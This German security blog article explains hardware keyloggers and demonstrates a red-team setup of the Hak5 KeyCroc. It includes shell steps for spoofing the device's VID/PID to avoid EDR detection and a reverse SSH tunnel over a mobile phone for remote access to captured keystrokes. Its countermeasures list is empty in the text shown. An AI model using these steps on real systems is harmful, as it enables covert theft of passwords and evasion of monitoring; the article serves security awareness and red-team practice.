Hardware-Keylogger - Die unsichtbare Bedrohung

Hardware-Keylogger

Die unsichtbare Bedrohung

Marius Elmiger
von Marius Elmiger
am 06. Juli 2023
Lesezeit: 19 Minuten

Keypoints

So funktionieren Hardware-Keylogger

  • Eine Untersuchung des Zwecks und der Funktionsweise von Hardware-Keyloggern
  • Wie Hardware-Keylogger konfiguriert und installiert werden
  • Veranschaulichung des Prozesses der Erfassung von Tastenanschlägen
  • Erkennung und Verhinderung von Hardware-Keyloggern

Im Bereich der IT-Sicherheit entwickelt sich die Bedrohungslandschaft ständig weiter, wobei Hacker immer raffiniertere Methoden anwenden, um sich unbefugten Zugang zu sensiblen Informationen zu verschaffen. Zu den verdeckten Werkzeugen, die von den Angreifern eingesetzt werden können, gehören Hardware-Keylogger, die als unauffällige Geräte entwickelt wurden, um Tastenanschläge heimlich zu erfassen. Aufgrund ihrer Unauffälligkeit und ihrer Fähigkeit, jeden Tastendruck abzufangen und aufzuzeichnen, stellen diese Geräte für Unternehmen ein Risiko dar. In diesem Artikel tauchen wir in die Welt der Hardware-Keylogger ein und untersuchen ihre Funktionsweise, mögliche Anwendungen und die Massnahmen, die zum Schutz vor dieser Form des Angriffs erforderlich sind.

Das später in diesem Artikel beschriebene Angriffsszenario basiert hauptsächlich auf einer Insider-Bedrohung, bei der ein Angreifer einen Hardware-Keylogger einschleust, um vertrauliche Daten oder Kennwörter abzugreifen.

Was ist ein Hardware Keylogger?

Hardware-Keylogger sind physische Geräte, die zwischen der Tastatur und dem Computer angeschlossen werden. Sie zeichnen Informationen direkt von der Tastatur auf, bevor sie das Betriebssystem des Computers erreichen. Auf diese Weise ist der Angreifer in der Lage, Passwörter, Anmeldedaten und andere vertrauliche Informationen unbemerkt zu erfassen. Sie können die aufgezeichneten Daten intern in ihrem eigenen Speicher speichern oder sie drahtlos an einen entfernten Standort übertragen, um sie abzurufen. Hardware-Keylogger können schwer zu entdecken sein, da sie physisch zwischen der Tastatur und dem Computer befinden. Dadurch unterscheiden sie sich von Software-Keyloggern, die durch Antiviren-, Anti-Malware-Scans oder EDR-Lösungen entdeckt werden können.

Um einen Hardware-Keylogger von Grund auf selbst zu bauen, gibt es verschiedene Anleitungen, wie die von spacehuhn, keelog oder RedBulletTooling. Alternativ können auch fertige Keylogger von seriösen Herstellern erworben werden. Hak5 und O.MG gehören zu den bekannten und vertrauenswürdigen Herstellern in diesem Bereich. Leider handelt es sich bei kommerziellen Keyloggern meist um Closed Source. Daher ist es, selbst wenn der Hersteller allgemein als vertrauenswürdig eingestuft wird, unerlässlich, das Gerät einer detaillierten Analyse zu unterziehen, indem man die Funktionen überprüft.

KeyCroc Hardware Keylogger

Wer verwendet Hardware Keylogger?

Verschiedene Akteure können Hardware-Keylogger installieren, jeder mit seinen eigenen Motiven und Methoden. Hier sind einige mögliche Szenarien:

Es ist wichtig zu wissen, dass die Hardware-Keylogger unterschiedlich ausgefeilt sein können. Einige können unauffällig in das Gerät oder die Peripherie integriert sein, so dass sie visuell schwer zu erkennen sind. Ausserdem können Keylogger die erfassten Daten aus der Ferne übertragen, wenn sie über WLAN- oder mobile Datenverbindungsfunktionen verfügen

Ein Beispiel eines Angriffs

Die zuvor genannten Szenarien sind ideal, um bei einem Red Team Einsatz zu simulieren. In den folgenden Abschnitten erläutern wir, wie der Hak5 KeyCroc effektiv als Keylogger fungieren kann, der Tastatureingaben aufzeichnet und den Fernzugriff erleichtert. Es ist jedoch wichtig, darauf hinzuweisen, dass der KeyCroc über die Aufzeichnung von Tastatureingaben hinaus noch weitere Funktionen bietet. Dazu gehören Keystroke Injection, Geräteemulation, Pattern-Matching-Payloads, Netzwerk-Hijacking, Wi-Fi-Konnektivität und mehr. Darüber hinaus hat Hak5 mehrere Keystroke-Injection-Beispiele auf seinem GitHub-Repository bereitgestellt.

KeyCroc, Originalquelle: https://shop.hak5.org/products/key-croc

KeyCroc Konfiguration

Bevor der KeyCroc verwendet werden kann, sind einige Konfigurationsschritte erforderlich. Die folgenden Kapitel ergänzen die HAK5 KeyCroc Dokumentation. Ausserdem sollte das Verhalten des Keyloggers gründlich überprüfen, z. B. auf unerwünschte Kommunikation überprüft werden.

PID/VID ID Cloning

Der KeyCroc mit der Version 1.3_513 klont nicht die VID (Vendor ID) und PID (Product ID) der Tastatur. Ohne Cloning, wird der KeyCroc von modernen EDRs erkannt.

Standard KeyCroc wird von EDRs erkannt, Originalquelle: Microsoft Defender for Endpoint

Um dieses Verhalten zu korrigieren, empfehlen wir die folgenden Schritte:

Anpassung der Standard-VID und PID

Mit den folgenden Schritten kann die standardmässige KeyCroc VID und PID geändert werden.

cd /usr/local/croc/bin
cp ATTACKMODE ATTACKMODE.bak
nano ATTACKMODE

Wir empfehlen, auch die Standard-VID und PID für den Speicher und die Netzwerkkarte zu ändern

Behebung der Cloning-Funktionalität

Die folgenden Schritte sind notwendig damit Cloning-Funktionalität des keyCroc funktioniert

cd /usr/local/croc/bin
cp croc_framework croc_framework.bak
nano croc_framework

Allgemeine Einstellungen

Dieser Schritt muss nur einmal durchgeführt werden, bevor das KeyCroc Gerät verwendet werden kann.

Wir haben den KeyCroc mit den folgenden Tastaturen getestet:

KeyCroc in Aktion

KeyCroc in Aktion

Wie man das Loot Log ausliest

Loot Log Beispiel

Das PowerShell-Skript keycroc_char_analysis.ps1 kann Helfen Kennwörter oder andere Informationen schnell aufzuspüren.

Remote Verbindung über das Internet zum KeyCroc

Das folgende Proof-of-Concept beschreibt, wie man sich per SSH über das Internet mit dem KeyCroc verbinden kann.

POC-Voraussetzungen

Prepare the KeyCroc

ssh-keygen -t ed25519 -m PKCS8 -C "$(whoami)@$(hostname)-$(date -I)" -f ~/.ssh/id_ed25519_home

Remote SSH Server

sudo useradd -m keycroc
sudo mkdir /home/keycroc/.ssh
sudo touch /home/keycroc/.ssh/authorized_keys
sudo chown -R keycroc:keycroc /home/keycroc/.ssh/
sudo chmod 700 /home/keycroc/.ssh
sudo chmod 600 /home/keycroc/.ssh/authorized_keys
sudo nano /etc/passwd

Vorbereiten eines Geräts für die mobile Datenverbindungen

Im folgenden Beispiel wird ein Android-Telefon mit einem mobilen Datenverbindungstarif verwendet. Wir empfehlen die Verwendung einer Tastatur zur Konfiguration des Telefons. Das Telefon sollte verschlüsselt sein und ein starkes Passwort zum Entsperren des Telefons verwenden.

pkg upgrade
pkg update
pkg install openssh
pkg install screen

ssh -N -R 42022:localhost:8022 -p 50022 -i /data/data/com.termux/files/home/storage/downloads/keycroc-openssh-privkey.ppk keycroc@$SHHServerIP

Herstellung der Verbindung zum KeyCroc

ssh u0_a255@localhost -p 42022
ssh root@192.168.43.30

Remote Verbindung zum KeyCroc

Gegenmassnahmen

Um das Risiko von Hardware-Keyloggern zu verringern, können folgende Massnahmen ergriffen werden:

Fazit

Zusammenfassend lässt sich sagen, dass Hardware-Keylogger eine Bedrohung für die Sicherheit von Unternehmen darstellen können, da sie heimlich Tastatureingaben abfangen und aufzeichnen können, wodurch sensible Informationen ausgelesen werden könnten. Dieser Artikel hat einen Überblick über Hardware-Keylogger, ihre Angriffsszenarien und ein technisches Beispiel gegeben, das ihre Funktionsweise veranschaulicht. Um den mit Hardware-Keyloggern verbundenen Gefahren zu begegnen, ist es für Unternehmen entscheidend, einen umfassenden Ansatz zu verfolgen. Technologische Sicherheitsvorkehrungen spielen eine wichtige Rolle bei der Risikominimierung. Technologische Massnahmen allein sind jedoch nicht ausreichend. Unternehmen müssen auch der Schulung und Sensibilisierung ihrer Mitarbeiter Vorrang einräumen. Es ist wichtig, eine positive Sicherheitskultur innerhalb der Organisation zu fördern, die Bedeutung von Sicherheitsmassnahmen zu betonen und die Mitarbeiter zu ermutigen, sich aktiv an der IT-Sicherheit zu beteiligen. Ausserdem sollten Unternehmen ihre Mitarbeiter wertschätzen und ein Umfeld schaffen, in dem sie sich wertgeschätzt und motiviert fühlen. Dadurch wird die Loyalität gefördert und die Wahrscheinlichkeit von Insider-Bedrohungen verringert. Durch die Förderung eines positiven Arbeitsumfelds können Unternehmen das Risiko minimieren, dass Mitarbeiter zu bösartigen Aktivitäten übergehen. Schliesslich ist ein effektiver Rahmen für die Reaktion auf Vorfälle von entscheidender Bedeutung, um Keylogger-Vorfälle umgehend und effizient zu bekämpfen. Die Erstellung klarer Protokolle und Reaktionspläne, die Durchführung von Übungen und die Aufrechterhaltung starker Kommunikationskanäle innerhalb des Unternehmens ermöglichen eine schnelle Erkennung, Eindämmung und Lösung von Keylogger-Vorfällen. Durch die Kombination dieser Massnahmen können Unternehmen ihre Abwehr gegen Keylogger verbessern, die Risiken von Angreifern mindern und ihre IT-Umgebung besser schützen.

Über den Autor

Marius Elmiger

Marius Elmiger hat seit den frühen 2000er Jahren Erfahrung in verschiedenen Rollen als Administrator, Engineer, Architekt und Consultant gesammelt. Sein Fokus lag hauptsächlich in der Implementierung von komplexen IT-Infrastruktur Projekten, Umsetzung von Sicherheitskonzepten und Compromise Recoveries. Später wechselte er zur offensiven Seite, um sein Wissen weiter auszubauen. Als Grundlage neben zahlreichen Zertifikaten absolvierte Marius ein MSc in Advanced Security & Digital Forensics an der Edinburgh Napier University. (ORCID 0000-0002-2580-5636)

Links

Herausforderung Datenschutz-Grundverordnung DSGVO?

Unsere Spezialisten kontaktieren Sie gern!

×
Credential Tiering

Credential Tiering

Marius Elmiger

Credential Tiering

Credential Tiering

Marius Elmiger

Outsmarting the Watchdog

Outsmarting the Watchdog

Marius Elmiger

Versteckte Gefahren von Phishing-Attacken

Versteckte Gefahren von Phishing-Attacken

Marius Elmiger

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv